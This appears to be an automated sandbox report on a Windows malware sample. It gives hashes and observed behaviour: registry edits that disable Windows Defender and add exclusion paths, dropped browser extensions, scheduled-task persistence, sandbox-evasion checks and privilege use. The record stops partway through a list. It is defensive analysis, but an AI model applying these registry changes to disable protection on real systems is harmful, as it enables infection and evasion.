Analysis
-
max time kernel
201s -
max time network
202s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 05:12
Static task
static1
Behavioral task
behavioral1
Sample
b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe
Resource
win7-20240705-en
General
-
Target
b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe
-
Size
7.2MB
-
MD5
7f19c9c2900a42a22935eda2a8399084
-
SHA1
73509d0c7d2622167aa308de5d23dcced192c5df
-
SHA256
b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3
-
SHA512
62e10a813c0205c986ac41b443d6b32d8ce8d6d3a3943142147431965e10a2cc3d6919b71843a329aa3914e2d8a4a158d52475ca1cbee8a9f030562694bba95c
-
SSDEEP
196608:91OeNXiH6xUi1X18htRrPIPX2zSB23e0d:3OwXK6xLpivPY2zOwes
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\esZXvMCNuGEfqJuxklR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\esZXvMCNuGEfqJuxklR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QpEhKTiRofuFzpEd = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QpEhKTiRofuFzpEd = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QpEhKTiRofuFzpEd = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QpEhKTiRofuFzpEd = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MaCEdJmjU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hDwfgHvtnjxOxeVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hDwfgHvtnjxOxeVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CYZcjjLrQSSSC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CYZcjjLrQSSSC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EUXfJBljbcUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MaCEdJmjU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zWTlFEDWyZjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zWTlFEDWyZjU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EUXfJBljbcUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 3000 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1144 powershell.EXE 1868 powershell.EXE 1528 powershell.exe 1516 powershell.EXE 2244 powershell.exe 1700 powershell.exe 2852 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\International\Geo\Nation pjDElFp.exe -
Executes dropped EXE 4 IoCs
pid Process 2376 Install.exe 1812 Install.exe 2432 ikkfONE.exe 2664 pjDElFp.exe -
Loads dropped DLL 23 IoCs
pid Process 2036 b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe 2376 Install.exe 2376 Install.exe 2376 Install.exe 2376 Install.exe 1812 Install.exe 1812 Install.exe 1812 Install.exe 2684 WerFault.exe 2684 WerFault.exe 2684 WerFault.exe 3000 rundll32.exe 3000 rundll32.exe 3000 rundll32.exe 3000 rundll32.exe 1004 WerFault.exe 1004 WerFault.exe 1004 WerFault.exe 1004 WerFault.exe 1004 WerFault.exe 2960 WerFault.exe 2960 WerFault.exe 2960 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json pjDElFp.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json pjDElFp.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ikkfONE.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 pjDElFp.exe File created C:\Windows\system32\GroupPolicy\gpt.ini ikkfONE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ikkfONE.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini ikkfONE.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 pjDElFp.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE pjDElFp.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol pjDElFp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA pjDElFp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE pjDElFp.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\DtYclkI.dll pjDElFp.exe File created C:\Program Files (x86)\EUXfJBljbcUn\VYKGLdk.dll pjDElFp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi pjDElFp.exe File created C:\Program Files (x86)\zWTlFEDWyZjU2\osezCzeNyjIMx.dll pjDElFp.exe File created C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml pjDElFp.exe File created C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml pjDElFp.exe File created C:\Program Files (x86)\CYZcjjLrQSSSC\okfZnLx.dll pjDElFp.exe File created C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml pjDElFp.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi pjDElFp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja pjDElFp.exe File created C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml pjDElFp.exe File created C:\Program Files (x86)\MaCEdJmjU\szzNjM.dll pjDElFp.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak pjDElFp.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\rrUPsTjgSYBWMUseO.job schtasks.exe File created C:\Windows\Tasks\bbMwfSaEkvrmTtNtmp.job schtasks.exe File created C:\Windows\Tasks\LTdmnWMddFrWELagp.job schtasks.exe File created C:\Windows\Tasks\dZgNXlBFHKJPYkR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2684 2432 WerFault.exe 42 2960 2664 WerFault.exe 186 1004 1812 WerFault.exe 31 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A503714F-A2C7-48D6-A874-7096CE79F2FC}\ba-ad-2a-3a-8b-42 pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecisionTime = a05566faf5dbda01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ikkfONE.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ikkfONE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A503714F-A2C7-48D6-A874-7096CE79F2FC}\WpadDecision = "0" pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pjDElFp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A503714F-A2C7-48D6-A874-7096CE79F2FC}\WpadDecisionReason = "1" pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e09d69e7f5dbda01 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{A503714F-A2C7-48D6-A874-7096CE79F2FC}\ba-ad-2a-3a-8b-42 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs pjDElFp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecisionTime = a05566faf5dbda01 pjDElFp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecision = "0" pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople pjDElFp.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000600d4de7f5dbda01 ikkfONE.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 pjDElFp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecisionReason = "1" pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached ikkfONE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs pjDElFp.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ikkfONE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust pjDElFp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ba-ad-2a-3a-8b-42 rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1964 schtasks.exe 1148 schtasks.exe 2336 schtasks.exe 2020 schtasks.exe 2016 schtasks.exe 2444 schtasks.exe 1712 schtasks.exe 2724 schtasks.exe 2660 schtasks.exe 2600 schtasks.exe 2504 schtasks.exe 1368 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2852 powershell.exe 1144 powershell.EXE 1144 powershell.EXE 1144 powershell.EXE 1868 powershell.EXE 1868 powershell.EXE 1868 powershell.EXE 1528 powershell.exe 1516 powershell.EXE 1516 powershell.EXE 1516 powershell.EXE 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 1700 powershell.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2244 powershell.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe 2664 pjDElFp.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 WMIC.exe Token: SeSecurityPrivilege 2736 WMIC.exe Token: SeTakeOwnershipPrivilege 2736 WMIC.exe Token: SeLoadDriverPrivilege 2736 WMIC.exe Token: SeSystemProfilePrivilege 2736 WMIC.exe Token: SeSystemtimePrivilege 2736 WMIC.exe Token: SeProfSingleProcessPrivilege 2736 WMIC.exe Token: SeIncBasePriorityPrivilege 2736 WMIC.exe Token: SeCreatePagefilePrivilege 2736 WMIC.exe Token: SeBackupPrivilege 2736 WMIC.exe Token: SeRestorePrivilege 2736 WMIC.exe Token: SeShutdownPrivilege 2736 WMIC.exe Token: SeDebugPrivilege 2736 WMIC.exe Token: SeSystemEnvironmentPrivilege 2736 WMIC.exe Token: SeRemoteShutdownPrivilege 2736 WMIC.exe Token: SeUndockPrivilege 2736 WMIC.exe Token: SeManageVolumePrivilege 2736 WMIC.exe Token: 33 2736 WMIC.exe Token: 34 2736 WMIC.exe Token: 35 2736 WMIC.exe Token: SeDebugPrivilege 1144 powershell.EXE Token: SeDebugPrivilege 1868 powershell.EXE Token: SeDebugPrivilege 1528 powershell.exe Token: SeAssignPrimaryTokenPrivilege 984 WMIC.exe Token: SeIncreaseQuotaPrivilege 984 WMIC.exe Token: SeSecurityPrivilege 984 WMIC.exe Token: SeTakeOwnershipPrivilege 984 WMIC.exe Token: SeLoadDriverPrivilege 984 WMIC.exe Token: SeSystemtimePrivilege 984 WMIC.exe Token: SeBackupPrivilege 984 WMIC.exe Token: SeRestorePrivilege 984 WMIC.exe Token: SeShutdownPrivilege 984 WMIC.exe Token: SeSystemEnvironmentPrivilege 984 WMIC.exe Token: SeUndockPrivilege 984 WMIC.exe Token: SeManageVolumePrivilege 984 WMIC.exe Token: SeDebugPrivilege 1516 powershell.EXE Token: SeDebugPrivilege 1700 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2932 WMIC.exe Token: SeIncreaseQuotaPrivilege 2932 WMIC.exe Token: SeSecurityPrivilege 2932 WMIC.exe Token: SeTakeOwnershipPrivilege 2932 WMIC.exe Token: SeLoadDriverPrivilege 2932 WMIC.exe Token: SeSystemtimePrivilege 2932 WMIC.exe Token: SeBackupPrivilege 2932 WMIC.exe Token: SeRestorePrivilege 2932 WMIC.exe Token: 